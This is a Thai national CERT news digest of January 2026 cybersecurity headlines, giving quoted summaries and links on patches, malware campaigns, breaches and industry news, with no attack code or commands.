โพสต์ถูกสร้างโดย NCSA_THAICERT

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

New Tooling

• AuraInspector: Auditing Salesforce Aura For Data Exposure
  "Mandiant is releasing AuraInspector, a new open-source tool designed to help defenders identify and audit access control misconfigurations within the Salesforce Aura framework. Salesforce Experience Cloud is a foundational platform for many businesses, but Mandiant Offensive Security Services (OSS) frequently identifies misconfigurations that allow unauthorized users to access sensitive data including credit card numbers, identity documents, and health information. These access control gaps often go unnoticed until it is too late."
  https://cloud.google.com/blog/topics/threat-intelligence/auditing-salesforce-aura-data-exposure
  https://github.com/google/aura-inspector
  https://www.theregister.com/2026/01/13/mandiant_salesforce_tool/
  https://www.helpnetsecurity.com/2026/01/13/aurainspector-open-source-tool-salesforce-aura/

Vulnerabilities

• Adobe Patches Critical Apache Tika Bug In ColdFusion
  "Adobe has released security updates for 11 products on January 2026 Patch Tuesday, addressing a total of 25 vulnerabilities, including a critical code execution flaw. The critical-severity issue, tracked as CVE-2025-66516 (CVSS score of 10/10), is an XML External Entity (XXE) injection bug in Apache Tika modules that could be exploited via XFA files placed inside PDF documents. The security defect was patched in early December, when Apache warned that successful exploitation could lead to information leaks, SSRF attacks, denial-of-service (DoS), or remote code execution (RCE)."
  https://www.securityweek.com/adobe-patches-critical-apache-tika-bug-in-coldfusion/
• SAP’s January 2026 Security Updates Patch Critical Vulnerabilities
  "Enterprise software maker SAP on Tuesday announced the release of 17 new security notes as part of its January 2026 Security Patch Day. Four of the notes address critical-severity vulnerabilities. The first note in SAP’s January 2026 advisory resolves CVE-2026-0501 (CVSS score of 9.9), a critical SQL injection bug in S/4HANA. The issue impacts a Remote Function Call-enabled module relying on the ABAP Database Connectivity (ADBC) framework for the execution of a native SQL statement, explains Onapsis, which discovered and reported the bug."
  https://www.securityweek.com/saps-january-2026-security-updates-patch-critical-vulnerabilities/
• Microsoft January 2026 Patch Tuesday Fixes 3 Zero-Days, 114 Flaws
  "Today is Microsoft's January 2026 Patch Tuesday with security updates for 114 flaws, including one actively exploited and two publicly disclosed zero-day vulnerabilities. This Patch Tuesday also addresses eight "Critical" vulnerabilities, 6 of which are remote code execution flaws and 2 are elevation-of-privilege flaws."
  https://www.bleepingcomputer.com/news/microsoft/microsoft-january-2026-patch-tuesday-fixes-3-zero-days-114-flaws/
  https://www.darkreading.com/application-security/microsofts-starts-2026-bang-zero-day
  https://blog.talosintelligence.com/microsoft-patch-tuesday-january-2026/
  https://cyberscoop.com/microsoft-patch-tuesday-january-2026/
  https://www.securityweek.com/microsoft-patches-exploited-windows-zero-day-111-other-vulnerabilities/
  https://www.theregister.com/2026/01/14/patch_tuesday_january_2026/
• 'Most Severe AI Vulnerability To Date' Hits ServiceNow
  "Authentication issues in ServiceNow potentially opened the door for arbitrary attackers to gain full control over the entire platform and access to the various systems connected to it. ServiceNow is a Fortune 500 company that, according to its promotional materials, acts as an IT services management platform for 85% of the companies that comprise the rest of the Fortune 500. That alone makes it a critical supply chain risk to the US business sector. Beyond that, ServiceNow is deeply integrated into its customers' broader IT infrastructure, more so than most vendors: ServiceNow's tentacles spread through HR, customer service, security, and the various other systems that keep a company running. To an attacker, it's both an ideal launchpad for lateral movement and a treasure trove of sensitive operational and customer data in its own right."
  https://www.darkreading.com/remote-workforce/ai-vulnerability-servicenow
  https://thehackernews.com/2026/01/servicenow-patches-critical-ai-platform.html
  https://cyberscoop.com/servicenow-fixes-critical-ai-vulnerability-cve-2025-12420/
• CyRC Advisory: Vulnerability In Broadcom Chipset Causes Network Disruption And Client Disconnection On Wireless Routers
  "The Black Duck Cybersecurity Research Center (CyRC) discovered an issue while testing the interoperability of the Defensics Fuzzing with 802.11 protocol test suites against ASUS routers. During testing, the CyRC team found Defensics anomaly test cases that caused the network to stop working until the router was manually reset. This vulnerability allows an attacker to make the access point unresponsive to all clients and terminate any ongoing client connections. If data transmission to subsequent systems is ongoing, the data may become corrupted or, at minimum, the transmission will be interrupted."
  https://www.blackduck.com/blog/cyrc-discovers-asus-tplink-wlan-vulnerabilities.html
  https://www.securityweek.com/broadcom-wi-fi-chipset-flaw-allows-hackers-to-disrupt-networks/
  https://www.bankinfosecurity.com/one-simple-trick-to-knock-out-wi-fi-network-a-30502
• Remote Code Execution With Modern AI/ML Formats And Libraries
  "We identified vulnerabilities in three open-source artificial intelligence/machine learning (AI/ML) Python libraries published by Apple, Salesforce and NVIDIA on their GitHub repositories. Vulnerable versions of these libraries allow for remote code execution (RCE) when a model file with malicious metadata is loaded."
  https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/
  https://www.theregister.com/2026/01/13/ai_python_library_bugs_allow/

Malware

• Ukraine's Army Targeted In New Charity-Themed Malware Campaign
  "Officials of Ukraine's Defense Forces were targeted in a charity-themed campaign between October and December 2025 that delivered backdoor malware called PluggyApe. Ukraine's CERT says in a report that the attacks were likely launched by the Russian threat group known as 'Void Blizzard' and 'Laundry Bear', although there is medium confidence in attribution. Laundry Bear is the same threat group responsible for breaching the Dutch police's internal systems in 2024 and stealing sensitive information about officers."
  https://www.bleepingcomputer.com/news/security/ukraines-army-targeted-in-new-charity-themed-malware-campaign/
  https://therecord.media/kremlin-linked-hackers-pose-as-charities-spy-ukraine
• Unveiling VoidLink – A Stealthy, Cloud-Native Linux Malware Framework
  "In December 2025, Check Point Research identified a small cluster of previously unseen Linux malware samples that appear to originate from a Chinese-affiliated development environment. Many of the binaries included debug symbols and other development artifacts, suggesting we were looking at in-progress builds rather than a finished, widely deployed tool. The speed and variety of changes across the samples indicate a framework that is being iterated upon quickly to achieve broader, real-world use."
  https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/
  https://thehackernews.com/2026/01/new-advanced-linux-voidlink-malware.html
  https://www.bleepingcomputer.com/news/security/new-voidlink-malware-framework-targets-linux-cloud-servers/
  https://www.infosecurity-magazine.com/news/chinese-malware-framework-linux/
• Convincing LinkedIn Comment-Reply Tactic Used In New Phishing
  "Scammers are flooding LinkedIn posts this week with fake "reply" comments that appear to come from the platform itself, warning users of bogus policy violations and urging them to visit an external link. The messages convincingly impersonate LinkedIn branding and in some cases even use the company’s official lnkd.in URL shortener, making the phishing links harder to distinguish from legitimate ones."
  https://www.bleepingcomputer.com/news/security/convincing-linkedin-comment-reply-tactic-used-in-new-phishing/
• Silent Push Uncovers New Magecart Network: Disrupting Online Shoppers Worldwide
  "While investigating intelligence shared with us, a set of indicators that were also found on our Bulletproof Host Indicators Of Future Attack (IOFA) feeds, our team discovered a vast network of domains related to a long-term and ongoing credit card skimming campaign. Current findings suggest this campaign has been active for several years, dating back to the beginning of 2022. This campaign utilizes scripts targeting at least six major payment network providers: American Express, Diners Club, Discover (a subsidiary of Capital One), JCB Co., Ltd., Mastercard, and UnionPay. Enterprise organizations that are clients of these payment providers are the most likely to be impacted."
  https://www.silentpush.com/blog/magecart/
  https://thehackernews.com/2026/01/long-running-web-skimming-campaign.html
  https://www.bankinfosecurity.com/magecart-hits-continue-stripe-spoofing-supply-chain-risks-a-30507
  https://hackread.com/magecart-targets-all-credit-cards-users/
  https://www.infosecurity-magazine.com/news/global-magecart-campaign-six-card/
• DeVixor: An Evolving Android Banking RAT With Ransomware Capabilities Targeting Iran
  "deVixor is an actively developed Android banking malware campaign operating at scale, targeting Iranian users through phishing websites that masquerade as legitimate automotive businesses. Distributed as malicious APK files, deVixor has evolved from a basic SMS-harvesting threat into a fully featured Remote Access Trojan (RAT) that combines banking fraud, credential theft, ransomware, and persistent device surveillance within a single platform."
  https://cyble.com/blog/devixor-an-evolving-android-banking-rat-with-ransomware-capabilities-targeting-iran/
• SHADOW#REACTOR – Text-Only Staging, .NET Reactor, And In-Memory Remcos RAT Deployment
  "The Securonix Threat Research team has analyzed a multi-stage Windows malware campaign tracked as SHADOW#REACTOR. The infection chain follows a tightly orchestrated execution path: an obfuscated VBS launcher executed via wscript.exe invokes a PowerShell downloader, which retrieves fragmented, text-based payloads from a remote host. These fragments are reconstructed into encoded loaders, decoded in memory by a .NET Reactor–protected assembly, and used to fetch and apply a remote Remcos configuration. The final stage leverages MSBuild.exe as a living-off-the-land binary (LOLBin) to complete execution, after which the Remcos RAT backdoor is fully deployed and takes control of the compromised system."
  https://www.securonix.com/blog/shadowreactor-text-only-staging-net-reactor-and-in-memory-remcos-rat-deployment/
  https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html
  https://www.darkreading.com/endpoint-security/shadow-reactor-uses-text-files-to-deliver-remcos-rat
  https://www.infosecurity-magazine.com/news/shadowreactor-text-staging-remcos/
• Malicious Chrome Extension Steals MEXC API Keys By Masquerading As Trading Tool
  "Cybersecurity researchers have disclosed details of a malicious Google Chrome extension that's capable of stealing API keys associated with MEXC, a centralized cryptocurrency exchange (CEX) available in over 170 countries, while masquerading as a tool to automate trading on the platform. The extension, named MEXC API Automator (ID: pppdfgkfdemgfknfnhpkibbkabhghhfh), has 29 downloads and is still available on the Chrome Web Store as of writing. It was first published on September 1, 2025, by a developer named "jorjortan142.""
  https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html
• Key Insights On SHADOW-AETHER-015 And Earth Preta From The 2025 MITRE ATT&CK Evaluation With Trend Vision One
  "This blog examines notable modern techniques, tactics, and procedures (TTPs) that Trend Research has observed in the two emulations during the MITRE ATT&CK Evaluation Round 7 (ER7 2025) that featured Earth Preta (also known as Mustang Panda), and SHADOW-AETHER-015 (Trend Research’s intrusion name for a particular group of activities with modern TTPs characterized by AI-generated attacks, sophisticated phishing attacks, and/or social engineering). These observed, analyzed, and reported TTPs support the performance of Trend Vision One in ER7, reinforcing the position of TrendAI as a trusted leader in detection and response innovation."
  https://www.trendmicro.com/en_us/research/26/a/shadow-aether-015-earth-preta-mitre.html
• Stealthy Malware Masking Its Activity, Deploying Infostealer
  "Our experts have detected a new wave of malicious emails targeting Russian private-sector organizations. The goal of the attack is to infect victims’ computers with an infostealer. This campaign is particularly noteworthy because the attackers tried to disguise their activity as the operations of legitimate software and traffic to the ubiquitously-used state and municipal services website."
  https://www.kaspersky.com/blog/malicious-mailing-masking-activity/55104/

Breaches/Hacks/Leaks

• Belgian Hospital AZ Monica Shuts Down Servers After Cyberattack
  "Belgian hospital AZ Monica was forced to shut down all servers, cancel scheduled procedures, and transfer critical patients earlier today due to a cyberattack. The hospital, which operates campuses in Antwerp and Deurne, disconnected all servers at 6:32 AM after its systems were hit. The cyberattack also forced the hospital to suspend all scheduled procedures on Tuesday, as the emergency department continues to operate at reduced capacity, even though emergency medical services and intensive care transport units remain offline."
  https://www.bleepingcomputer.com/news/security/belgian-hospital-az-monica-shuts-down-servers-after-cyberattack/
  https://securityaffairs.com/186882/cyber-crime/az-monica-hospital-in-belgium-shuts-down-servers-after-cyberattack.html
• Central Maine Healthcare Breach Exposed Data Of Over 145,000 People
  "A data breach last year at Central Maine Healthcare (CMH) exposed sensitive information of more than 145,000 individuals. The hackers persisted on the organization's systems for more than two months last year, between March 19 and June 1, when CMH discovered the intrusion. The CMH integrated healthcare delivery system serves at least 400,000 people and manages hospitals like Central Maine Medical Center (CMMC), Bridgton Hospital, and Rumford Hospital."
  https://www.bleepingcomputer.com/news/security/central-maine-healthcare-breach-exposed-data-of-over-145-000-people/
• Betterment Confirms Data Breach After Wave Of Crypto Scam Emails
  "U.S. digital investment advisor Betterment confirmed that hackers breached its systems and sent fake crypto-related messages to some customers. The threat actor last week delivered fraudulent emails from Betterment infrastructure, luring recipients into a reward scam disguised as a company promotion that claimed to triple the amount of cryptocurrency sent to a specific address."
  https://www.bleepingcomputer.com/news/security/betterment-confirms-data-breach-after-wave-of-crypto-scam-emails/
• After Goldman, JPMorgan Discloses Law Firm Data Breach
  "JPMorgan Chase is informing some investors about a data breach stemming from a recent cybersecurity incident at an outside law firm. The same incident triggered a similar data breach notice from Goldman Sachs in December 2025. The Maine Attorney General’s Office requires companies that have suffered a data breach impacting the state’s residents to submit a report and a copy of the notification letter sent to affected individuals."
  https://www.securityweek.com/after-goldman-jpmorgan-discloses-law-firm-data-breach/
• Suspected Ransomware Attack Threatens One Of South Korea’s Largest Companies
  "Kyowon Group, one of South Korea’s largest education and lifestyle companies, announced shutting down key parts of its internal computer network this weekend following what it described as a suspected ransomware attack. In a company statement, Kyowon said it identified abnormal activity on Saturday morning, triggering an emergency response plan to isolate the affected servers and prevent hackers compromising more of its systems."
  https://therecord.media/kyowon-group-south-korea-suspected-ransomware-attack

General News

• AI Supply Chain Risk: Will CIOs Be Held Accountable?
  "When reports of Korean Air losing sensitive data on tens of thousands of employees surfaced, the incident was initially seen as a routine data breach. But reports soon indicated the exposure stemmed from a supply chain attack on a catering vendor responsible for in-flight meals and duty-free retail operations. But the vendor was running Oracle E-Business Suite, which contained a critical-severity vulnerability tracked as CVE-2025-61882. The flaw was discovered in early October 2025, after several enterprises reportedly received emails from attackers claiming to have already exploited the flaw to gain access and steal data."
  https://www.bankinfosecurity.com/blogs/ai-supply-chain-risk-will-cios-be-held-accountable-p-4024
• Building a Solid IT Strategy In An Unstable World
  "It's not surprising in today's world to wake up to news of dramatic changes in the geopolitical climate, of protests erupting overnight that could destabilize governments, or of nation-state actors launching cyberattacks. Geopolitical instability is a part of reality in 2026, and the stakes are high for CIOs who must rely on global supply chains to develop IT, artificial intelligence, cloud and cybersecurity strategies."
  https://www.bankinfosecurity.com/building-solid-strategy-in-unstable-world-a-30512
• Latin America Sees Sharpest Rise In Cyber Attacks In December 2025 As Ransomware Activity Accelerates
  "In December 2025, organizations experienced an average of 2,027 cyber attacks per organization per week. This represents a 1% month-over-month increase and a 9% year-over-year increase. While overall growth remained moderate, Latin America recorded the sharpest regional increase, with organizations experiencing an average of 3,065 attacks per week, a 26% increase year over year. The data points to sharper regional and sector-level spikes in activity, driven primarily by ransomware operations and expanding exposure linked to enterprise adoption of generative AI (GenAI)."
  https://blog.checkpoint.com/research/latin-america-sees-sharpest-rise-in-cyber-attacks-in-december-2025-as-ransomware-activity-accelerates/
• Doctor Web’s Q4 2025 Review Of Virus Activity On Mobile Devices
  "According to detection statistics collected by Dr.Web Security Space for mobile devices, the trojans Android.MobiDash and Android.HiddenAds, which display intrusive ads, were again the most widespread Android threats. At the same time, their activity decreased, and they were detected less frequently on protected devices by 43.24% and 18.06%, respectively. These malicious programs were followed by trojans from the Android.Siggen family, which includes malware whose functionality varies. They were also detected less often—by 27.47%."
  https://news.drweb.com/show/review/?lng=en&i=15101
  https://hackread.com/q4-2025-malware-telegram-backdoor-joker-google-play/
• Rakuten Viber CISO/CTO On Balancing Encryption, Abuse Prevention, And Platform Resilience
  "In this Help Net Security interview, Liad Shnell, CISO and CTO at Rakuten Viber, discusses how messaging platforms have become critical infrastructure during crises and conflicts. He explains how it influences cybersecurity priorities, from encryption and abuse prevention to incident response and user protection. Shnell also outlines how Viber assesses and mitigates risks that blend technical threats with human behavior."
  https://www.helpnetsecurity.com/2026/01/13/liad-shnell-rakuten-viber-messaging-cybersecurity-risks/
• Teaching Cybersecurity By Letting Students Break Things
  "Cybersecurity students show higher engagement when the work feels tangible. A new study from Airbus Cybersecurity and Dauphine University describes what happens when courses move beyond lectures and place students inside structured hacking scenarios, social engineering exercises, and competitive games."
  https://www.helpnetsecurity.com/2026/01/13/gamified-cybersecurity-training-study/
  https://www.mdpi.com/2624-800X/6/1/16
• What Insurers Expect From Cyber Risk In 2026
  "Technology shifts, policy decisions, and attacker behavior are changing at the same time, and their effects increasingly overlap. Insurers, brokers, and security teams are feeling that pressure across underwriting, claims, and risk management. A new global study by CyberCube examines how these changes are expected to influence cyber risk through 2026. AI remains a top priority across the insurance sector, though adoption still trails ambition. 82% of insurance leaders say AI ranks as a top business imperative. Deployment at scale remains limited."
  https://www.helpnetsecurity.com/2026/01/13/cybercube-insurance-cyber-risk-2026/
• Cyber Insights 2026: External Attack Surface Management
  "Shadows are dark and dangerous places where bad guys attack anything or anyone they find. In 2026, AI will increase the number and size of shadows, together with the entire external attack surface. External Attack Surface Management (EASM) is the process of finding and managing every asset an organization exposes to the internet. Those assets may be known (and therefore documented and may be secured) or unknown (and therefore invisible and almost certainly insecure). While EASM covers both categories, we are primarily concerned with the invisible assets."
  https://www.securityweek.com/cyber-insights-2026-external-attack-surface-management/
• More Than 40 Countries Impacted By North Korea IT Worker Scams, Crypto Thefts
  "The U.S. on Monday urged United Nation member states to take a tougher stance against North Korean efforts to skirt sanctions through its IT worker scheme and cryptocurrency heists. Eleven countries led a session at the UN headquarters in New York centered around a 140-page report released last fall that covered North Korea’s extensive cyber-focused efforts to fund its nuclear and ballistic weapons program. The report links the North Korean IT worker scheme — where citizens of the country steal identities and secure employment at western companies — with Pyongyang’s billion-dollar crypto thefts."
  https://therecord.media/40-countries-impacted-nk-it-thefts-united-nations
• Dutch Cops Cuff Alleged AVCheck Malware Kingpin In Amsterdam
  "Dutch police believe they have arrested a man behind the AVCheck online platform - a service used by cybercrims that Operation Endgame shuttered in May. The country's public prosecutor's office (LP) issued a statement on Monday, confirming the arrest of a 33-year-old Dutchman in connection with its investigation into the malware service, without specifying it or the man by name."
  https://www.theregister.com/2026/01/13/avcheck_arrest/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

Vulnerabilities

• Max Severity Ni8mare Flaw Impacts Nearly 60,000 n8n Instances
  "Nearly 60,000 n8n instances exposed online remain unpatched against a maximum-severity vulnerability dubbed "Ni8mare." n8n is an open-source workflow automation platform that allows users to connect different applications and services via pre-built connectors and a visual, node-based interface to automate repetitive tasks without writing code. The automation platform is widely used in AI development to automate data ingestion and build AI agents and RAG pipelines. It has over 100 million pulls on Docker Hub and over 50,000 weekly downloads on npm."
  https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-impacts-nearly-60-000-n8n-instances/
• CISA Adds One Known Exploited Vulnerability To Catalog
  "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
  CVE-2025-8110 Gogs Path Traversal Vulnerability"
  https://www.cisa.gov/news-events/alerts/2026/01/12/cisa-adds-one-known-exploited-vulnerability-catalog
  https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-gogs-rce-flaw-exploited-in-zero-day-attacks/
  https://securityaffairs.com/186837/hacking/u-s-cisa-adds-a-flaw-in-gogs-to-its-known-exploited-vulnerabilities-catalog.html

Malware

• RMM Tools (Syncro, SuperOps, NinjaOne, Etc.) Being Distributed Disguised As Video Files
  "AhnLab SEcurity intelligence Center (ASEC) recently discovered cases of attacks using RMM tools such as Syncro, SuperOps, NinjaOne, and ScreenConnect. Threat actors distributed a PDF file that prompted users to download and run the RMM tool from a disguised distribution page such as Google Drive. The certificate used to sign the malware shows that the threat actor has been performing similar attacks since at least October 2025."
  https://asec.ahnlab.com/en/91995/
• The Unfriending Truth: How To Spot a Facebook Phishing Scam Before It's Too Late
  "As one of the world's largest social media platforms, with over 3 billion active users, Facebook is a frequent target for phishing scams. Hackers aim to hijack user accounts to exploit people in their network. The goal is to steal the victim's credentials so the attackers can take over the account, spread scams, steal personal data, or commit identity fraud. In the second half of 2025, Trellix observed a surge in Facebook phishing scams employing a variety of tactics and techniques, most notably the "Browser in the Browser" (BitB) technique. This advanced method tricks users by simulating a legitimate third-party login pop-up window (like a Facebook authentication screen) within the browser tab, effectively masking a credential-harvesting page."
  https://www.trellix.com/en-au/blogs/research/the-unfriending-truth-how-to-spot-a-facebook-phishing-scam/
  https://www.bleepingcomputer.com/news/security/facebook-login-thieves-now-using-browser-in-browser-trick/
• 'Bad Actor' Hijacks Apex Legends Characters In Live Matches
  "Apex Legends players over the weekend experienced disruptions during live matches as threat actors hijacked their characters, disconnected them, and changed their nicknames. Respawn, the publisher of the still popular battle royale-hero shooter, issued a public statement about the security incident, assuring players that it hadn't been caused by an exploit or malware infection. The title continues to have a large user base, with an estimated half a million daily concurrent players across all platforms as of mid-2025."
  https://www.bleepingcomputer.com/news/security/bad-actor-hijacks-apex-legends-characters-in-live-matches/
• Hidden Telegram Proxy Links Can Reveal Your IP Address In One Click
  "A single click on what may appear to be a Telegram username or harmless link is all it takes to expose your real IP address to attackers due to how proxy links are handled. Telegram tells BleepingComputer it will now add warnings to proxy links after researchers demonstrated that specially crafted links could be used to reveal a Telegram user's real IP address without any further confirmation."
  https://www.bleepingcomputer.com/news/security/hidden-telegram-proxy-links-can-reveal-your-ip-address-in-one-click/
• n8mare On Auth Street: Supply Chain Attack Targets n8n Ecosystem
  "Attackers infiltrated n8n's community node ecosystem this week with a malicious npm package that masqueraded as a Google Ads integration. The package, n8n-nodes-hfgjf-irtuinvcm-lasdqewriit, tricked developers into entering OAuth credentials through what appeared to be a legitimate credential form, then silently exfiltrated them during workflow execution to an attacker-controlled server. This novel supply chain attack—targeting users beyond n8n's recently disclosed remote code execution (RCE) flaws—demonstrates how threat actors are exploiting trust in community-maintained integrations."
  https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem
  https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html
• Scaling The Fraud Economy: Pig Butchering As a Service
  "The scam industry has undergone massive transformations over the last decade. The cliché image of the once-iconic Nigerian prince duping Westerners from a local cybercafé is now passé. Western Africa is still a hotbed for digital fraud operations, but it has been superseded in both scale and efficiency by hundreds of industrial-scale scam centres now scattered throughout Southeast Asia. Over the past decade major Chinese-speaking criminal groups have managed to infiltrate a growing number of countries in Southeast Asia, securing vast amounts of land to build cities and special economic zones dedicated to crime operations."
  https://www.infoblox.com/blog/threat-intelligence/scaling-the-fraud-economy-pig-butchering-as-a-service/
  https://thehackernews.com/2026/01/researchers-uncover-service-providers.html
• Analyzing a Multi-Stage AsyncRAT Campaign Via Managed Detection And Response
  "AsyncRAT has emerged as a notable Remote Access Trojan (RAT) used by threat actors for its robust capabilities and ease of deployment. It gained favor for its extensive feature set, which includes keylogging, screen capturing, and remote command execution capabilities. Its modular architecture, typically implemented in Python, provides flexibility and ease of customization, making it a preferred tool of choice for cybercriminals. During our investigation of AsyncRAT infections, we observed Python scripts playing a central role in the infection chain, automating various stages of the attack."
  https://www.trendmicro.com/en_us/research/26/a/analyzing-a-a-multi-stage-asyncrat-campaign-via-mdr.html
• Malicious Crystal PDF Converter Detected On SLTT Networks
  "In late October 2025, the Center for Internet Security (CIS) Cyber Threat Intelligence (CTI) team observed an increase in CIS Managed Detection and Response (CIS MDR) alerts associated with a malicious fake PDF converter called Crystal PDF on U.S. State, Local, Tribal, and Territorial (SLTT) government entity endpoints. The CIS CTI team’s analysis confirmed that Crystal PDF is a managed .NET (F#) staged loader, but the second-stage payload was unavailable for analysis."
  https://www.cisecurity.org/insights/blog/malicious-crystal-pdf-converter-detected-on-sltt-networks
• THE KNOWNSEC LEAK: Yet Another Leak Of China’s Contractor-Driven Cyber-Espionage Ecosystem
  "In November of 2025, an allegedly massive leak of data from Chinese company “KnownSec” was posted to a github account. The initial leak was covered by Wired Magazine, and a few other outlets. The leak has since been pulled off of Github and downloaded by very few, and of those few who gained access, only one uploaded 65 documents as a primer to the leak elsewhere for others to see. DTI was able to get the 65 document images and this report is derived from this slice of a much larger leak that is out there but not available."
  https://dti.domaintools.com/the-knownsec-leak-yet-another-leak-of-chinas-contractor-driven-cyber-espionage-ecosystem/

Breaches/Hacks/Leaks

• University Of Hawaii Cancer Center Hit By Ransomware Attack
  "University of Hawaii says a ransomware gang breached its Cancer Center in August 2025, stealing data of study participants, including documents from the 1990s containing Social Security numbers. Founded in 1907, the University of Hawaii (UH) System now includes 3 universities and 7 community colleges, as well as 10 campuses and training and research centers across the Hawaiian Islands. Its Cancer Center is located in the Kakaʻako district of Honolulu and has over 300 faculty and staff, as well as an additional 200 affiliate members."
  https://www.bleepingcomputer.com/news/security/university-of-hawaii-cancer-center-hit-by-ransomware-attack/
  https://www.securityweek.com/hackers-accessed-university-of-hawaii-cancer-center-patient-data-they-werent-immediately-notified/
• Target's Dev Server Offline After Hackers Claim To Steal Source Code
  "Hackers are claiming to be selling internal source code belonging to Target Corporation, after publishing what appears to be a sample of stolen code repositories on a public software development platform. Last week, an unknown threat actor created multiple repositories on Gitea that appeared to contain portions of Target's internal code and developer documentation. The repositories were presented as a preview of a much larger dataset allegedly being offered for sale to buyers on an underground forum or private channel."
  https://www.bleepingcomputer.com/news/security/targets-dev-server-offline-after-hackers-claim-to-steal-source-code/
• Spanish Energy Giant Endesa Discloses Data Breach Affecting Customers
  "Spanish energy provider Endesa and its Energía XXI operator are notifying customers that hackers accessed the company's systems and accessed contract-related information, which includes personal details. Endesa is the largest electric utility company in Spain, now owned by Enel Group, that distributes gas and electricity to more than 10 million customers in Spain and Portugal. In total, the company says it has about 22 million clients."
  https://www.bleepingcomputer.com/news/security/spanish-energy-giant-endesa-discloses-data-breach-affecting-customers/
• Everest Ransomware Claims Breach At Nissan, Says 900GB Of Data Stolen
  "The notorious Everest ransomware group claims to have breached Nissan Motor Corporation (Nissan Motor Co., Ltd.), the Japanese multinational automobile manufacturer. The group published its claims on its dark web leak site on January 10, 2026, sharing six screenshots allegedly taken from the stolen data. They also revealed a directory structure showing ZIP archives, text files, Excel sheets, and CSV documents."
  https://hackread.com/everest-ransomware-nissan-data-breach/
• Armenia Probes Alleged Sale Of 8 Million Government Records On Hacker Forum
  "Hackers are offering for sale what they claim is a large trove of Armenian government-related data, prompting officials in Yerevan to open an investigation into a potential breach. The alleged seller, using the alias dk0m, said it gained access to a government notification system used to distribute official communications, including legal and administrative notices."
  https://therecord.media/armenia-probes-alleged-sale-government-records

General News

• What Security Teams Can Learn From Torrent Metadata
  "Security teams often spend time sorting through logs and alerts that point to activity happening outside corporate networks. Torrent traffic shows up in investigations tied to policy violations, insider risk, and criminal activity. A new research paper looks at that same torrent activity through an open source intelligence lens and asks how much signal security teams can extract from data that is already public."
  https://www.helpnetsecurity.com/2026/01/12/torrent-metadata-osint-research/
• Downtime Pushes Resilience Planning Into Security Operations
  "CISOs describe a shift in how they define success. New research from Absolute Security shows broad agreement that resilience outweighs security goals centered on prevention alone. Security leaders increasingly define their role around keeping the business operating through disruption. CISOs see themselves as responsible for recovery when incidents interrupt operations. Business continuity, endpoint restoration, and coordination with IT teams fall within their scope. Formal resilience strategies have become common, indicating that this shift is built into planning instead of treated as an add on."
  https://www.helpnetsecurity.com/2026/01/12/absolute-ciso-resilience-planning/
• Statistics Report On Malware Targeting Windows Web Servers In Q4 2025
  "AhnLab SEcurity intelligence Center (ASEC) is using the AhnLab Smart Defense (ASD) infrastructure to respond to and categorize attacks targeting poorly managed Windows web servers. This post will cover the damage status of Windows web servers that have become attack targets and the statistics of attacks that occurred against these servers in the fourth quarter of 2025. Additionally, it will categorize the malware strains used in each attack and provide detailed statistics."
  https://asec.ahnlab.com/en/92002/
• Statistics Report On Malware Targeting Windows Database Servers In Q4 2025
  "AhnLab SEcurity intelligence Center (ASEC) utilizes the AhnLab Smart Defense (ASD) infrastructure to respond to and categorize attacks targeting MS-SQL and MySQL servers installed on Windows operating systems. This post covers the damage status of MS-SQL and MySQL servers that have become attack targets and statistics on attacks against these servers, based on the logs identified in the fourth quarter of 2025. It also categorizes the malware strains used in each attack and provides detailed statistics."
  https://asec.ahnlab.com/en/92003/
• Statistics Report On Malware Targeting Linux SSH Servers In Q4 2025
  "AhnLab SEcurity intelligence Center (ASEC) utilizes a honeypot to respond to and classify brute-force and dictionary attacks targeting poorly managed Linux SSH servers. This post covers the status of the attack sources identified in the logs from the fourth quarter of 2025 and the statistics of attacks launched by these sources. It also classifies the malware strains used in each attack and provides detailed statistics."
  https://asec.ahnlab.com/en/92004/
• Hacker Gets Seven Years For Breaching Rotterdam And Antwerp Ports
  "The Amsterdam Court of Appeal sentenced a 44-year-old Dutch national to seven years in prison for multiple crimes, including computer hacking and attempted extortion. The man was arrested in 2021 and convicted in 2022 by the Amsterdam District Court, but he appealed the sentence because authorities had unlawfully intercepted his communications, deriving incriminating evidence. These communications occurred on the end-to-end encrypted chat service Sky ECC. Europol 'cracked' the service in 2021, which led to the arrest of the CEO and multiple users. The actions deriving from the operation extended into last year."
  https://www.bleepingcomputer.com/news/security/hacker-gets-seven-years-for-breaching-rotterdam-and-antwerp-ports/
  https://therecord.media/dutch-court-sentences-hacker-who-smuggled-cocaine-ports
• Cybersecurity In The Public Sector: Challenges, Strategies And Best Practices
  "Once upon a time, computer crimes were associated with the image of a hacker in a black hoodie working in a dark room by the glow of a monitor. But times have changed, and so have the threats. From simple penetration attempts, cyber attacks have evolved into complex, coordinated operations specifically targeting state systems, rather than pursued merely for entertainment or recognition."
  https://hackread.com/cybersecurity-public-sector-challenges-strategies-practices/
• Rethinking OT Security For Project Heavy Shipyards
  "In this Help Net Security interview, Hans Quivooij, CISO at Damen Shipyards Group, discusses securing OT and ICS in the shipyard. He outlines how project-based operations, rotating contractors, and temporary systems expand the threat surface and complicate access control. Quivooij also covers visibility in legacy environments and the risks introduced by IT and OT integration."
  https://www.helpnetsecurity.com/2026/01/12/hans-quivooij-damen-shipyards-group-securing-shipyard-ot-ics/
• Global Cybersecurity Outlook 2026
